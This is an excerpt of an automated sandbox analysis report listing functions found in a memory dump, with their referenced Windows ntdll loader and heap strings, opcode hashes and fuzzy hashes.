                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                • API String ID: 0-1151232445
                                                                                                                                                • Opcode ID: 9cc4e8a19ed5038c8b021362460c991adac95f75d81fee6c4b5eaea2bb26b66d
                                                                                                                                                • Instruction ID: f6fe127a29b8c2f1db56066c3ee27928aa811c61229c440d626e073f3b47312d
                                                                                                                                                • Opcode Fuzzy Hash: 9cc4e8a19ed5038c8b021362460c991adac95f75d81fee6c4b5eaea2bb26b66d
                                                                                                                                                • Instruction Fuzzy Hash: 0F41D678240340CFEB1ACE2CD89477577A09F09349F6544A9D8458B596CF76F886CB62
                                                                                                                                                Function 326515EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                • LdrpAllocateTls, xrefs: 3269194A
                                                                                                                                                • minkernel\ntdll\ldrtls.c, xrefs: 32691954
                                                                                                                                                • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 32691943
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                                • API String ID: 0-4274184382
                                                                                                                                                • Opcode ID: 5a068cfd6faadfbe188c7d8cef3422c9edc564d4b0fea6690be2a2052f6e4955
                                                                                                                                                • Instruction ID: ea05a991cebdced920008c987acca4ef53d5813b716878de58f4af088189f18e
                                                                                                                                                • Opcode Fuzzy Hash: 5a068cfd6faadfbe188c7d8cef3422c9edc564d4b0fea6690be2a2052f6e4955
                                                                                                                                                • Instruction Fuzzy Hash: 7341A9B5A01305EFDB19CFA8C980AAEBBF1FF48704F248199E405A7251DB75A801CF94
                                                                                                                                                Function 3262A1E3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 3262A229
                                                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 3262A21B
                                                                                                                                                • @S_2, xrefs: 3262A268
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: @S_2$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                • API String ID: 0-3775708676
                                                                                                                                                • Opcode ID: d9286b6e4053620df7d8eb431cd95dcbf6992d3a8339b1c00648bf3a2f72861a
                                                                                                                                                • Instruction ID: 1441dd16ef78060ad5abddfea2874414dab8577c86af96d210343e4c7de1ec3c
                                                                                                                                                • Opcode Fuzzy Hash: d9286b6e4053620df7d8eb431cd95dcbf6992d3a8339b1c00648bf3a2f72861a
                                                                                                                                                • Instruction Fuzzy Hash: 1641BCB4A01784DFEB09CF5AC880B5A77B4FF85754F2840A5EC01DB2A0EAB6DD40CB52
                                                                                                                                                Function 326AB214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 326AB2B2
                                                                                                                                                • @, xrefs: 326AB2F0
                                                                                                                                                • GlobalFlag, xrefs: 326AB30F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                • API String ID: 0-4192008846
                                                                                                                                                • Opcode ID: a053d0cd648bbeb397bd11de32ce611566cf5e25eca3ea3e9de974e9f58e8e63
                                                                                                                                                • Instruction ID: 34fbdce6bf8a3e267ba37a1aed595698467b6363e73f708650e08ae8b6568533
                                                                                                                                                • Opcode Fuzzy Hash: a053d0cd648bbeb397bd11de32ce611566cf5e25eca3ea3e9de974e9f58e8e63
                                                                                                                                                • Instruction Fuzzy Hash: E6315CB1D00209AEDB11DF94DC90AEEBBBCEF54748F4404A9E601A7140DB749E448BA4
                                                                                                                                                Function 32651527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                • DLL "%wZ" has TLS information at %p, xrefs: 3269184A
                                                                                                                                                • LdrpInitializeTls, xrefs: 32691851
                                                                                                                                                • minkernel\ntdll\ldrtls.c, xrefs: 3269185B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                • API String ID: 0-931879808
                                                                                                                                                • Opcode ID: 05ef50857e4ccf6ae816ce62cb43dc2e2e1270e74ad96b1b5794c301328bc7d7
                                                                                                                                                • Instruction ID: 9d09561b4de54bc12334f03eab509bd6b632406e0a7bc09a3c7bd24a8c749fdb
                                                                                                                                                • Opcode Fuzzy Hash: 05ef50857e4ccf6ae816ce62cb43dc2e2e1270e74ad96b1b5794c301328bc7d7
                                                                                                                                                • Instruction Fuzzy Hash: 263105B1A51301BBF7188F55CD85F9A77A8FF44B94F210599E502B7280EBB0BD41CB94
                                                                                                                                                Function 326BAA40 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 326BAABF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                                                • API String ID: 3446177414-1911121157
                                                                                                                                                • Opcode ID: dfb625cf66248b7c3f4aa2d7cb3003e7843f2b2ce10ebef1ff543e5143d71e3c
                                                                                                                                                • Instruction ID: 603ce978bcb6acb1cccb4f034f12ee912d2987da86d0290ab97b478e5d167fa6
                                                                                                                                                • Opcode Fuzzy Hash: dfb625cf66248b7c3f4aa2d7cb3003e7843f2b2ce10ebef1ff543e5143d71e3c
                                                                                                                                                • Instruction Fuzzy Hash: 723178B2A00208EFDB01CF65CD40F5ABBB5FF88B14F108669F901A7680CB38AC41CB90
                                                                                                                                                Function 32627623 Relevance: 3.2, APIs: 2, Instructions: 179COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 63937b037e4b0b48db83de21f33bbe1e3c31612445aac156a14b9c043edc2956
                                                                                                                                                • Instruction ID: 59543cde5227297d969edccc650b3011438143998dae0293adad6e0456626222
                                                                                                                                                • Opcode Fuzzy Hash: 63937b037e4b0b48db83de21f33bbe1e3c31612445aac156a14b9c043edc2956
                                                                                                                                                • Instruction Fuzzy Hash: E1617E75A01706EFDB09CF78C880A9DFBB5BF88344F24826AD519A7311DB70A941CF95
                                                                                                                                                Function 326351C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: @$@
                                                                                                                                                • API String ID: 0-149943524
                                                                                                                                                • Opcode ID: e5ac1c80c61831ae64cdf08447906ddd4e06da85ed026aa77937f8c1a9c85c18
                                                                                                                                                • Instruction ID: ae92c135129377ce9a4f1ed8faa8d2bfc97d37adfc0f0a6fe68aef5ac33fcb3b
                                                                                                                                                • Opcode Fuzzy Hash: e5ac1c80c61831ae64cdf08447906ddd4e06da85ed026aa77937f8c1a9c85c18
                                                                                                                                                • Instruction Fuzzy Hash: A332D0B55093518BD72ACF14C4A0B6EB7F1EF88758F50491EFA85872A0EB74D884CB93
                                                                                                                                                Function 32625622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                • Opcode ID: 2a0dffcb07652da62576bc81f90309e4d41c835d927f093d0fa1573eca230cae
                                                                                                                                                • Instruction ID: 1653b1ad081ff65c168e118f1a4620cfc7dc70fd77cf608e1ff11ae138e9b2b8
                                                                                                                                                • Opcode Fuzzy Hash: 2a0dffcb07652da62576bc81f90309e4d41c835d927f093d0fa1573eca230cae
                                                                                                                                                • Instruction Fuzzy Hash: C231EF30201B12FFE75A9B64CA50F8AFBA5BF88754F100025E90197A60DBB0E821CFD5
                                                                                                                                                Function 326FB55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 326FB5C4
                                                                                                                                                • RedirectedKey, xrefs: 326FB60E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                                                • API String ID: 0-1388552009
                                                                                                                                                • Opcode ID: 0e51642f6f7919e28c62469c333f9678defb1758855e310c2ce85b8e9cb7a84e
                                                                                                                                                • Instruction ID: a6b0dfd5cd8d080a42f2e2f473cdddbe955f1068dd94c3b85b8886c0de084909
                                                                                                                                                • Opcode Fuzzy Hash: 0e51642f6f7919e28c62469c333f9678defb1758855e310c2ce85b8e9cb7a84e
                                                                                                                                                • Instruction Fuzzy Hash: 6E610DB5841218FBDF11DF94C888ADEBBB8FF08704F50446AE904E7240DB359A86CFA0
                                                                                                                                                Function 3263F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: $$$
                                                                                                                                                • API String ID: 3446177414-233714265
                                                                                                                                                • Opcode ID: 4507f6ab779c2c97b15436fc8f9b1b4dbbb43edc0e18fd08d64886d840b39990
                                                                                                                                                • Instruction ID: 3917d88dabb422cf9bccf366b2558be44d5c38e1df143f84fe831270442bfd86
                                                                                                                                                • Opcode Fuzzy Hash: 4507f6ab779c2c97b15436fc8f9b1b4dbbb43edc0e18fd08d64886d840b39990
                                                                                                                                                • Instruction Fuzzy Hash: 0A61EF75A02749CFEB2ACFA8C580B9DB7F5FF44308F104469D6056B7A0CBB5A940CB85
                                                                                                                                                Function 326B314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                • API String ID: 0-118005554
                                                                                                                                                • Opcode ID: 20bc9931a73513aa47e502c947a7afcf0deaa01cc302ed5fa8d17d01e07c7083
                                                                                                                                                • Instruction ID: ba8b8334f78b5b22d5766e488cd5cb99aadc8afd6aed9ccd7105e4c76557ba62
                                                                                                                                                • Opcode Fuzzy Hash: 20bc9931a73513aa47e502c947a7afcf0deaa01cc302ed5fa8d17d01e07c7083
                                                                                                                                                • Instruction Fuzzy Hash: 55310D752093809BD706CF6AD880B2AB3E8EFC5718F040869F9508B390EBB5D914CB97
                                                                                                                                                Function 326206CF Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: a2$ a2
                                                                                                                                                • API String ID: 0-402434715
                                                                                                                                                • Opcode ID: 1fa11d4a3c0b444dbae0111b27ed48015560471a03a8cdc86da23a69dc4e66e9
                                                                                                                                                • Instruction ID: de85e2960728f38c6693be70eb2cc311e59d6889c9ec39520ca7c66a84c21034
                                                                                                                                                • Opcode Fuzzy Hash: 1fa11d4a3c0b444dbae0111b27ed48015560471a03a8cdc86da23a69dc4e66e9
                                                                                                                                                • Instruction Fuzzy Hash: B031B136A04B469FD716DE288890E9BB7A5EFA47A0F014529FD559B310EE30DC05CFA2
                                                                                                                                                Function 326533D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                • RtlpInitializeAssemblyStorageMap, xrefs: 3269289A
                                                                                                                                                • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3269289F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                                • API String ID: 0-2653619699
                                                                                                                                                • Opcode ID: 0a1467250625af853e842e7108ce73a02f62054e3961e20c887e9f4d343e3791
                                                                                                                                                • Instruction ID: 30446ee424bcff42f9a961fa13a87bce9f180cdcc7e4e4dc14d281a75588de1b
                                                                                                                                                • Opcode Fuzzy Hash: 0a1467250625af853e842e7108ce73a02f62054e3961e20c887e9f4d343e3791
                                                                                                                                                • Instruction Fuzzy Hash: C911E5B6B05205BBF71A8B48CD41F9B77A9DFC8B54F208069BA04EB284DE74CD1186A5
                                                                                                                                                Function 3262C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: MUI
                                                                                                                                                • API String ID: 0-1339004836
                                                                                                                                                • Opcode ID: 15d8635ff7a0a7703ce2d4a9447c7c0db1f51c037b6a3fa95db42ab3968f84e6
                                                                                                                                                • Instruction ID: 1629b3d81d2789dbfc581eab80b832019c2190761db36d6603e471e185961641
                                                                                                                                                • Opcode Fuzzy Hash: 15d8635ff7a0a7703ce2d4a9447c7c0db1f51c037b6a3fa95db42ab3968f84e6
                                                                                                                                                • Instruction Fuzzy Hash: CA826A79E003188FEB24CFA9C980BEDB7B1FF48354F11816AD859AB291DB719981CF51
                                                                                                                                                Function 326264F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: f5608497121e8e1cf9d588c81223721e7d9c33e75948bd5a6a17482cb3277ef9
                                                                                                                                                • Instruction ID: f1a640b3f13ea4eca30a83e22935aca5cecad28ef9da9893a5b1e99eceb633b6
                                                                                                                                                • Opcode Fuzzy Hash: f5608497121e8e1cf9d588c81223721e7d9c33e75948bd5a6a17482cb3277ef9
                                                                                                                                                • Instruction Fuzzy Hash: 1AE19B75609342CFD308CF28C090A5ABBE1FF88358F548A6DE99997351DB31E906CF92
                                                                                                                                                Function 32621051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                • Opcode ID: 514a6c4834eeb563e53ecabef943151e66c5b0c4e2e7f939eb8d0eb77f629666
                                                                                                                                                • Instruction ID: 1f70f42097f7828ca6383a9eb9f5656b4000fc480e36a2be6328c367196ef241
                                                                                                                                                • Opcode Fuzzy Hash: 514a6c4834eeb563e53ecabef943151e66c5b0c4e2e7f939eb8d0eb77f629666
                                                                                                                                                • Instruction Fuzzy Hash: DFB100B56093808FD354CF28C480A5AFBF1BF89708F1449AEF89997352D771E985CB82
                                                                                                                                                Function 3262254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                • Opcode ID: b62f6fb136f03131742b11b39127b4104f44d4c949040b7d590d2d95c1865de2
                                                                                                                                                • Instruction ID: 0f6c62361b78f2c1a6b9b71ec4f85f9b71d2654fc30f4dedc60d01b36b28b8cf
                                                                                                                                                • Opcode Fuzzy Hash: b62f6fb136f03131742b11b39127b4104f44d4c949040b7d590d2d95c1865de2
                                                                                                                                                • Instruction Fuzzy Hash: A7419F75901708CFD729CF28D950B49B7F5FF88354F2186AAD417AB2A0DB70A981CF42
                                                                                                                                                Function 32624779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                • Opcode ID: 2141d8838817b5ca68729213cb126baa0f8567851a147f8586edbd7443bfd068
                                                                                                                                                • Instruction ID: 0645799f1b9fb8088541a5ea973ba6ef9091d9b90847dae9872a5d889aa7850e
                                                                                                                                                • Opcode Fuzzy Hash: 2141d8838817b5ca68729213cb126baa0f8567851a147f8586edbd7443bfd068
                                                                                                                                                • Instruction Fuzzy Hash: 9F41F5756153818FD325CF28C894B2ABBE9FF81394F10442DE9428B2A1DB78D851CF92
                                                                                                                                                Function 3261B420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                • Opcode ID: edec889f1147d250c2d28c26f376fa35906b65c1f3234e532f90477e41484f21
                                                                                                                                                • Instruction ID: 2d20465819dbbd61e35fab95c61bda1bc75616afac8a10ae344001f9728aab57
                                                                                                                                                • Opcode Fuzzy Hash: edec889f1147d250c2d28c26f376fa35906b65c1f3234e532f90477e41484f21
                                                                                                                                                • Instruction Fuzzy Hash: 99313372541204AFC311CF14C881A9A77A9FF987A4F10826DEE459F2A1CB31FD42CBD5
                                                                                                                                                Function 326256E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
